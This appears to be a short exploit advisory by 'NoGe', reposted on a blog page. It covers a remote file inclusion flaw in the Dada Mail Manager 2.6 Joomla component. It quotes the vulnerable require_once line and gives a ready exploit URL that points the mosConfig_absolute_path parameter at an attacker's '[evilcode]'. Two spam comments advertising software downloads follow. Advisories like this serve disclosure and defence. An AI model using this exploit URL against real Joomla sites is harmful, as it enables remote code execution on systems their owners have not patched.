Dada Mail Manager 2.6 - RFI


[o] Dada Mail Manager Joomla Component 2.6 Remote File Inclusion Vulnerability
Software : com_dadamail version 2.6
Vendor : http://joomlander.net
Download : http://joomlacode.org/gf/project/dadamailmanager/frs
Author : NoGe


[o] Vulnerable file
administrator/components/com_dadamail/config.dadamail.php
require_once($GLOBALS['mosConfig_absolute_path'] . '/administrator/components/com_dadamail/language/default.php');


[o] Exploit
http://localhost/[path]/administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=[evilcode]


2 Responses so far.

  1. Best Software Downloads and Reviews. the most comprehensive source for free-to-
    trysoftware downloads on the WebBEST 4
    DOWNLOADS

  2. The most comprehensive source for free-to-trysoftware downloads on...